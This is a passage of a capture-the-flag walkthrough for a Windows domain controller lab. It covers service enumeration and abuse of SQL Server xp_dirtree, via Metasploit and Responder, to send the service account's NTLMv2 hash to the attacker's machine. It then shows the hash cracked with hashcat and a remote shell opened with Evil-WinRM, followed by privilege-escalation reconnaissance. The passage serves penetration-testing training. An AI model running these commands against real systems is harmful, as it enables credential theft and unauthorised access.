| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
|_ssl-date: 2023-03-13T05:04:24+00:00; +7h59m18s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-03-13T05:04:25+00:00; +7h59m18s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ssl-date: 2023-03-13T05:04:24+00:00; +7h59m18s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-03-11T20:10:28
|_Not valid after: 2053-03-11T20:10:28
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
|_ssl-date: 2023-03-13T05:04:24+00:00; +7h59m18s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-03-13T05:04:25+00:00; +7h59m18s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h59m17s, deviation: 0s, median: 7h59m17s
| smb2-time:
| date: 2023-03-13T05:03:45
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.41 seconds
As usual, there are an infinite number of ports open on a windows machine and not happy, let’s also take a look at the UDP ports.
┌──(in7rud3r㉿kali-muletto)-[~/GoogleDrive/hackthebox]
└─$ sudo nmap -sU 10.10.11.202
[sudo] password for in7rud3r:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-12 17:13 EDT
Nmap scan report for 10.10.11.202
Host is up (0.11s latency).
Not shown: 998 open|filtered udp ports (no-response)
PORT STATE SERVICE
53/udp open domain
123/udp open ntp
Nmap done: 1 IP address (1 host up) scanned in 290.76 seconds
Little steal, thank goodness! Ok, let’s analyze one port at a time!
Nothing about this set, unless I’ve missed something.
The enum4linux tool doesn’t enumerate anything in particular, let’s try a manual approach.
I’m able to connect using the rpcclient tool (rpcclient -U “” -N 10.10.11.202), but investigating this would take too much time, I’ll mark it as an activity to come back to if I can’t find anything else and move on.
┌──(in7rud3r㉿kali-muletto)-[~/GoogleDrive/hackthebox/_10.10.11.202 - Escape (win)]
└─$ smbclient -L //10.10.11.202
Password for [WORKGROUPin7rud3r]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Public Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.202 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
The SAMBA client shows, among the classic windows shares, a “Public” folder that could be interesting, let’s take a look.
┌──(in7rud3r㉿kali-muletto)-[~/GoogleDrive/hackthebox/_10.10.11.202 - Escape (win)]
└─$ smbclient --no-pass \\10.10.11.202\Public
Try "help" to get a list of possible commands.
smb: > dir
. D 0 Sat Nov 19 06:51:25 2022
.. D 0 Sat Nov 19 06:51:25 2022
SQL Server Procedures.pdf A 49551 Fri Nov 18 08:39:43 2022
5184255 blocks of size 4096. 1428481 blocks available
smb: > get "SQL Server Procedures.pdf"
getting file SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (10.3 KiloBytes/sec) (average 10.3 KiloBytes/sec)
Give a look at the pdf file.
Well, a good domain to insert into my /etc/hosts; go ahead.
As for LDAP, I tried to navigate the structure using phpLDAPAdmin as usual, but without success.
And for the uninitiated, port 1433 is the one reserved for SQL Server. There will be a lot of work here; let’s work.
The Metasploit Framework is full of attacks for SQL Server… and I think I’ve tried a lot of them.
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > use admin/mssql/mssql_enum
msf6 auxiliary(admin/mssql/mssql_enum) > options
Module options (auxiliary/admin/mssql/mssql_enum):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 1433 yes The target port (TCP)
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
USERNAME sa no The username to authenticate as
USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set)
View the full module info with the info, or info -d command.
msf6 auxiliary(admin/mssql/mssql_enum) > set password GuestUserCantWrite1
password => GuestUserCantWrite1
msf6 auxiliary(admin/mssql/mssql_enum) > set rhosts sequel.htb
rhosts => sequel.htb
msf6 auxiliary(admin/mssql/mssql_enum) > set username PublicUser
username => PublicUser
msf6 auxiliary(admin/mssql/mssql_enum) > exploit
[*] Running module against 10.10.11.202
[*] 10.10.11.202:1433 - Running MS SQL Server Enumeration...
[*] 10.10.11.202:1433 - Version:
[*] Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
[*] Sep 24 2019 13:48:23
[*] Copyright (C) 2019 Microsoft Corporation
[*] Express Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
[*] 10.10.11.202:1433 - Configuration Parameters:
[*] 10.10.11.202:1433 - C2 Audit Mode is Not Enabled
[...]
[*] 10.10.11.202:1433 - sp_getbindtoken
[*] 10.10.11.202:1433 - sp_replincrementlsn
[*] 10.10.11.202:1433 - Instances found on this server:
[*] 10.10.11.202:1433 - Default Server Instance SQL Server Service is running under the privilege of:
[*] 10.10.11.202:1433 - xp_regread might be disabled in this system
[*] Auxiliary module execution completed
msf6 auxiliary(admin/mssql/mssql_enum) > use admin/mssql/mssql_enum_domain_accounts
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > options
Module options (auxiliary/admin/mssql/mssql_enum_domain_accounts):
Name Current Setting Required Description
---- --------------- -------- -----------
FuzzNum 10000 yes Number of principal_ids to fuzz.
PASSWORD no The password for the specified username
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 1433 yes The target port (TCP)
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
USERNAME sa no The username to authenticate as
USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set)
View the full module info with the info, or info -d command.
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > set password GuestUserCantWrite1
password => GuestUserCantWrite1
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > set rhosts sequel.htb
rhosts => sequel.htb
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > set username PublicUser
username => PublicUser
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > exploit
[*] Running module against 10.10.11.202
[*] 10.10.11.202:1433 - Attempting to connect to the database server at 10.10.11.202:1433 as PublicUser...
[+] 10.10.11.202:1433 - Connected.
[*] 10.10.11.202:1433 - SQL Server Name: DC
[...][
[+] 10.10.11.202:1433 - 31 user accounts, groups, and computer accounts were found.
[*] 10.10.11.202:1433 - Query results have been saved to: /home/in7rud3r/.msf4/loot/20230313173523_default_10.10.11.202_mssql.domain.acc_775956.txt
[*] Auxiliary module execution completed
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > use admin/mssql/mssql_enum_sql_logins
msf6 auxiliary(admin/mssql/mssql_enum_sql_logins) > options
Module options (auxiliary/admin/mssql/mssql_enum_sql_logins):
Name Current Setting Required Description
---- --------------- -------- -----------
FuzzNum 300 yes Number of principal_ids to fuzz.
PASSWORD no The password for the specified username
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 1433 yes The target port (TCP)
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
USERNAME sa no The username to authenticate as
USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set)
View the full module info with the info, or info -d command.
msf6 auxiliary(admin/mssql/mssql_enum_sql_logins) > set password GuestUserCantWrite1
password => GuestUserCantWrite1
msf6 auxiliary(admin/mssql/mssql_enum_sql_logins) > set rhosts sequel.htb
rhosts => sequel.htb
msf6 auxiliary(admin/mssql/mssql_enum_sql_logins) > set username PublicUser
username => PublicUser
msf6 auxiliary(admin/mssql/mssql_enum_sql_logins) > exploit
[*] Running module against 10.10.11.202
[*] 10.10.11.202:1433 - Attempting to connect to the database server at 10.10.11.202:1433 as PublicUser...
[...]
[*] 10.10.11.202:1433 - - PublicUser
[*] 10.10.11.202:1433 - - sa
[*] 10.10.11.202:1433 - - sequelAdministrator
[*] Auxiliary module execution completed
I omitted some of the exploits I ran and also omitted some sections of the information returned by the scans, so as not to take up too much reading time.
But let’s connect to the SQL Server instance and investigate the contents of the DBs.
┌──(in7rud3r㉿kali-muletto)-[~]
└─$ python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py sequel.htb/PublicUser:GuestUserCantWrite1@10.10.11.202
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DCSQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DCSQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL> select @@version
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
Sep 24 2019 13:48:23
Copyright (C) 2019 Microsoft Corporation
Express Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
SQL> SELECT name, database_id, create_date FROM sys.databases;
name database_id create_date
-------------------------------------------------------------------------------------------------------------------------------- ----------- -----------
master 1 2003-04-08 09:13:36
tempdb 2 2023-03-13 09:35:39
model 3 2003-04-08 09:13:36
msdb 4 2019-09-24 14:21:42
SQL> SELECT * FROM INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
-------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------------------- ----------
master dbo spt_fallback_db b'BASE TABLE'
master dbo spt_fallback_dev b'BASE TABLE'
master dbo spt_fallback_usg b'BASE TABLE'
master dbo spt_values b'VIEW'
master dbo spt_monitor b'BASE TABLE'
SQL> use tempdb
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: tempdb
[*] INFO(DCSQLMOCK): Line 1: Changed database context to 'tempdb'.
SQL> SELECT * FROM INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
-------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------------------- ----------
SQL> use model
[-] ERROR(DCSQLMOCK): Line 1: The server principal "PublicUser" is not able to access the database "model" under the current security context.
SQL> use msdb
[*] ENVCHANGE(DATABASE): Old Value: tempdb, New Value: msdb
[*] INFO(DCSQLMOCK): Line 1: Changed database context to 'msdb'.
SQL> SELECT * FROM INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
-------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------------------- ----------
msdb dbo syspolicy_policy_category_subscriptions b'VIEW'
msdb dbo syspolicy_system_health_state b'VIEW'
msdb dbo syspolicy_policy_execution_history b'VIEW'
msdb dbo syspolicy_policy_execution_history_details b'VIEW'
msdb dbo syspolicy_configuration b'VIEW'
msdb dbo syspolicy_conditions b'VIEW'
msdb dbo syspolicy_policy_categories b'VIEW'
msdb dbo sysdac_instances b'VIEW'
msdb dbo syspolicy_object_sets b'VIEW'
msdb dbo dm_hadr_automatic_seeding_history b'BASE TABLE'
msdb dbo syspolicy_policies b'VIEW'
msdb dbo backupmediaset b'BASE TABLE'
msdb dbo backupmediafamily b'BASE TABLE'
msdb dbo backupset b'BASE TABLE'
msdb dbo autoadmin_backup_configuration_summary b'VIEW'
msdb dbo backupfile b'BASE TABLE'
msdb dbo syspolicy_target_sets b'VIEW'
msdb dbo restorehistory b'BASE TABLE'
msdb dbo restorefile b'BASE TABLE'
msdb dbo syspolicy_target_set_levels b'VIEW'
msdb dbo restorefilegroup b'BASE TABLE'
msdb dbo logmarkhistory b'BASE TABLE'
msdb dbo suspect_pages b'BASE TABLE'
SQL>
Besides the SQL Server version which may come in handy to identify some specific exploit, the DB doesn’t seem to contain many schemas and tables. I tried some exciting system queries, but most of them gave “permission denied“. I, therefore, rely on the now official guide for identifying vulnerabilities.
Inside the guide, we find an interesting attack, which is worth trying.
The concept behind this attack is to force the SQL Server to authenticate to a fake server that will capture the unsuspecting service’s credentials.
So, activate our responder…
┌──(in7rud3r㉿kali-muletto)-[~]
└─$ sudo responder -I tun0
[sudo] password for in7rud3r:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.111]
Responder IPv6 [dead:beef:2::106d]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-IM2J35A52MX]
Responder Domain Name [GFB0.LOCAL]
Responder DCE-RPC Port [47501]
[+] Listening for events...
…let’s take advantage of one of the Metasploit Framework exploits…
┌──(in7rud3r㉿kali-muletto)-[~]
└─$ msfconsole
______________________________________
/ it looks like you're trying to run a
module /
--------------------------------------
__
/
| |
@ @
| |
|| |/
|| ||
|_/|
___/
=[ metasploit v6.3.4-dev ]
+ -- --=[ 2294 exploits - 1201 auxiliary - 409 post ]
+ -- --=[ 968 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Use help <command> to learn more
about any command
Metasploit Documentation: https://docs.metasploit.com/
msf6 > use auxiliary/admin/mssql/mssql_ntlm_stealer
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > options
Module options (auxiliary/admin/mssql/mssql_ntlm_stealer):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 1433 yes The target port (TCP)
SMBPROXY 0.0.0.0 yes IP of SMB proxy or sniffer.
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME sa no The username to authenticate as
USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set)
View the full module info with the info, or info -d command.
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > set password GuestUserCantWrite1
password => GuestUserCantWrite1
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > set rhosts sequel.htb
rhosts => sequel.htb
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > set username PublicUser
username => PublicUser
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > set smbproxy 10.10.14.111
smbproxy => 10.10.14.111
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > exploit
[*] 10.10.11.202:1433 - DONT FORGET to run a SMB capture or relay module!
[*] 10.10.11.202:1433 - Forcing SQL Server at 10.10.11.202 to auth to 10.10.14.111 via xp_dirtree...
[+] 10.10.11.202:1433 - Successfully executed xp_dirtree on 10.10.11.202
[+] 10.10.11.202:1433 - Go check your SMB relay or capture module for goodies!
[*] sequel.htb:1433 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
…and wait for the attacked service to fall into the trap.
[...]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.202
[SMB] NTLMv2-SSP Username : sequelsql_svc
[SMB] NTLMv2-SSP Hash : sql_svc::sequel:5162e1326254c61a:EC2BB7C31D6D9609BA2E60B95A70D405:0101000000000000801D5DFA205AD901072D8534397365F50000000002000800470046004200300001001E00570049004E002D0049004D0032004A00330035004100350032004D00580004003400570049004E002D0049004D0032004A00330035004100350032004D0058002E0047004600420030002E004C004F00430041004C000300140047004600420030002E004C004F00430041004C000500140047004600420030002E004C004F00430041004C0007000800801D5DFA205AD90106000400020000000800300030000000000000000000000000300000DF8773489E613E8360EB2D86BF5C2D8E833BD6F0CEFE259881A1240933E805980A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100310031000000000000000000
We now have a NetNTLM hash that we can safely hashcat after identifying the corresponding value of the specific hash (5600).
┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.202 - Escape (win)/attack/dwnl]
└─$ cat NTLMv2-SSP.hash
sql_svc::sequel:5162e1326254c61a:EC2BB7C31D6D9609BA2E60B95A70D405:0101000000000000801D5DFA205AD901072D8534397365F50000000002000800470046004200300001001E00570049004E002D0049004D0032004A00330035004100350032004D00580004003400570049004E002D0049004D0032004A00330035004100350032004D0058002E0047004600420030002E004C004F00430041004C000300140047004600420030002E004C004F00430041004C000500140047004600420030002E004C004F00430041004C0007000800801D5DFA205AD90106000400020000000800300030000000000000000000000000300000DF8773489E613E8360EB2D86BF5C2D8E833BD6F0CEFE259881A1240933E805980A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100310031000000000000000000
┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.202 - Escape (win)/attack/dwnl]
└─$ hashcat -m 5600 NTLMv2-SSP.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
/sys/class/hwmon/hwmon4/temp1_input: No such file or directory
OpenCL API (OpenCL 3.0 PoCL 3.1+debian Linux, None+Asserts, RELOC, SPIR, LLVM 14.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-penryn-Intel(R) Core(TM)2 Duo CPU T8300 @ 2.40GHz, 1410/2885 MB (512 MB allocatable), 2MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 0 MB
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 4 secs
Cracking performance lower than expected?
* Append -O to the commandline.
This lowers the maximum supported password/salt length (usually down to 32).
* Append -w 3 to the commandline.
This can cause your screen to lag.
* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.
* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework
SQL_SVC::sequel:5162e1326254c61a:ec2bb7c31d6d9609ba2e60b95a70d405:0101000000000000801d5dfa205ad901072d8534397365f50000000002000800470046004200300001001e00570049004e002d0049004d0032004a00330035004100350032004d00580004003400570049004e002d0049004d0032004a00330035004100350032004d0058002e0047004600420030002e004c004f00430041004c000300140047004600420030002e004c004f00430041004c000500140047004600420030002e004c004f00430041004c0007000800801d5dfa205ad90106000400020000000800300030000000000000000000000000300000df8773489e613e8360eb2d86bf5c2d8e833bd6f0cefe259881a1240933e805980a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e003100310031000000000000000000:REGGIE1234ronnie
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: SQL_SVC::sequel:5162e1326254c61a:ec2bb7c31d6d9609ba...000000
Time.Started.....: Sun Mar 19 05:29:14 2023 (30 secs)
Time.Estimated...: Sun Mar 19 05:29:44 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 395.6 kH/s (1.09ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10700288/14344385 (74.60%)
Rejected.........: 0/10700288 (0.00%)
Restore.Point....: 10699776/14344385 (74.59%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: REJONTE -> REESY15987
Hardware.Mon.#1..: Util: 91%
Started: Sun Mar 19 05:27:49 2023
Stopped: Sun Mar 19 05:29:46 2023
And after some waiting and patience, the password comes out. What better tool to use than Evil-WinRM?
┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.202 - Escape (win)/attack/dwnl]
└─$ evil-winrm -i 10.10.11.202 -u sql_svc -p REGGIE1234ronnie
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:Userssql_svcDocuments> whoami
sequelsql_svc
*Evil-WinRM* PS C:Userssql_svcDocuments> dir /users
Directory: C:users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/7/2023 8:58 AM Administrator
d-r--- 7/20/2021 12:23 PM Public
d----- 2/1/2023 6:37 PM Ryan.Cooper
d----- 2/7/2023 8:10 AM sql_svc
Obviously, this user can’t do much. You need a winPEAS session. We load the scanner on the BOX through the features made available by Evil-WinRM…
[...]
*Evil-WinRM* PS C:Userssql_svc> upload ../upld/winPEAS.bat /users/sql_svc/winPEAS.bat
Info: Uploading ../upld/winPEAS.bat to /users/sql_svc/winPEAS.bat
Data: 47928 bytes of 47928 bytes copied
Info: Upload successful!
…and start it, saving the result so as not to lose it.
./winPEAS.bat | tee wpeas.output
Let’s take it home the same way and analyze it.
[...]
*Evil-WinRM* PS C:Userssql_svc> download /users/sql_svc/wpeas.output ./wpeas.output
Info: Downloading /users/sql_svc/wpeas.output to ./wpeas.output
Info: Download successful!
Below is the information extracted from the winPEAS scan that I deemed worthy of note.
[...]
[+] WSUS
[i] You can inject 'fake' updates into non-SSL WSUS traffic (WSUXploit)
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#wsus
[...]
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
[...]
[+] DPAPI MASTER KEYS
[i] Use the Mimikatz 'dpapi::masterkey' module with appropriate arguments (/rpc) to decrypt
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi
Directory: C:Userssql_svcAppDataRoamingMicrosoftProtect
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 11/19/2022 3:11 AM S-1-5-21-4078382237-1492182817-2568127209-1106
[...]
C:WindowsPanthersetupinfo
C:WindowsSystem32ntds.dit
C:WindowsSystem32configSAM
C:WindowsSystem32configSYSTEM
C:WindowsSystem32configRegBackSAM
C:WindowsSystem32configRegBackSYSTEM
[...]
Obviously, in addition to some interesting files, the possible privileges available to the user are highlighted (to verify actual vulnerabilities) and the WSUS windows update service (often used precisely for the elevation of privileges).
Let’s try to understand if the WSUS is really vulnerable.
*Evil-WinRM* PS C:Userssql_svc> reg query HKLMSoftwarePoliciesMicrosoftWindowsWindowsUpdate /v WUServer
reg.exe : ERROR: The system was unable to find the specified registry key or value.
+ CategoryInfo : NotSpecified: (ERROR: The syst...y key or value.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
*Evil-WinRM* PS C:Userssql_svc> reg query HKCUSOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevated
reg.exe : ERROR: The system was unable to find the specified registry key or value.
+ CategoryInfo : NotSpecified: (ERROR: The syst...y key or value.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
*Evil-WinRM* PS C:Userssql_svc> reg query HKLMSOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevated
reg.exe : ERROR: The system was unable to find the specified registry key or value.
+ CategoryInfo : NotSpecified: (ERROR: The syst...y key or value.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
*Evil-WinRM* PS C:Userssql_svcDocuments> reg query HKLMSoftwarePoliciesMicrosoftWindowsWindowsUpdate /v WUServer
reg.exe : ERROR: The system was unable to find the specified registry key or value.
+ CategoryInfo : NotSpecified: (ERROR: The syst...y key or value.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
*Evil-WinRM* PS C:Userssql_svcDocuments> reg query HKLMSoftwarePoliciesMicrosoftWindowsWindowsUpdate
HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindowsWindowsUpdateAU
*Evil-WinRM* PS C:Userssql_svcDocuments> reg query HKLMSoftwarePoliciesMicrosoftWindowsWindowsUpdateAU
HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindowsWindowsUpdateAU
AUOptions REG_DWORD 0x3
HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindowsWindowsUpdateAUNoAutoUpdate
*Evil-WinRM* PS C:Userssql_svcDocuments>
Already from the windows registry keys, there doesn’t seem to be any hope.
Even on the privileges front, nothing particularly attractive seems to be highlighted, the masterkey of the user Ryan would be needed, but at the moment it does not seem to be available.
Let’s try some other tools, for example, PrivescCheck.
itm4nAlso in this case I report only the interesting and noteworthy things.
[...]
+------+------------------------------------------------+------+
| TEST | APPS > Non-default Apps | INFO |
+------+------------------------------------------------+------+
| DESC | Enumerate non-default and third-party applications by |
| | parsing the registry. |
+------+-------------------------------------------------------+
[*] Found 6 result(s).
Name FullName
---- --------
Microsoft SQL Server C:Program Files (x86)Microsoft SQL Server
Microsoft C:Program FilesMicrosoft
Microsoft SQL Server C:Program FilesMicrosoft SQL Server
Microsoft Visual Studio 10.0 C:Program FilesMicrosoft Visual Studio 10.0
VMware C:Program FilesVMware
VMware Tools C:Program FilesVMwareVMware Tools
[...]
+------+------------------------------------------------+------+
| TEST | UPDATES > System up to date? (info) | INFO |
+------+------------------------------------------------+------+
| DESC | Enumerate the installed updates and hotfixes by |
| | parsing the registry. If this fails, the check will |
| | fall back to the built-in 'Get-HotFix' cmdlet. |
+------+-------------------------------------------------------+
[*] Found 9 result(s).
HotFixID Description InstalledBy InstalledOn
-------- ----------- ----------- -----------
KB5011551 Update NT AUTHORITYSYSTEM 2023-02-02 - 13:18:08
KB5011574 Update sequelAdministrator 2023-02-02 - 12:07:20
KB4512578 Security Update sequelAdministrator 2023-02-01 - 23:13:20
KB4589208 Update NT AUTHORITYSYSTEM 2023-02-01 - 21:10:30
KB5012170 Security Update sequelAdministrator 2023-02-01 - 21:00:27
KB5020374 Security Update NT AUTHORITYSYSTEM 2023-02-01 - 19:29:33
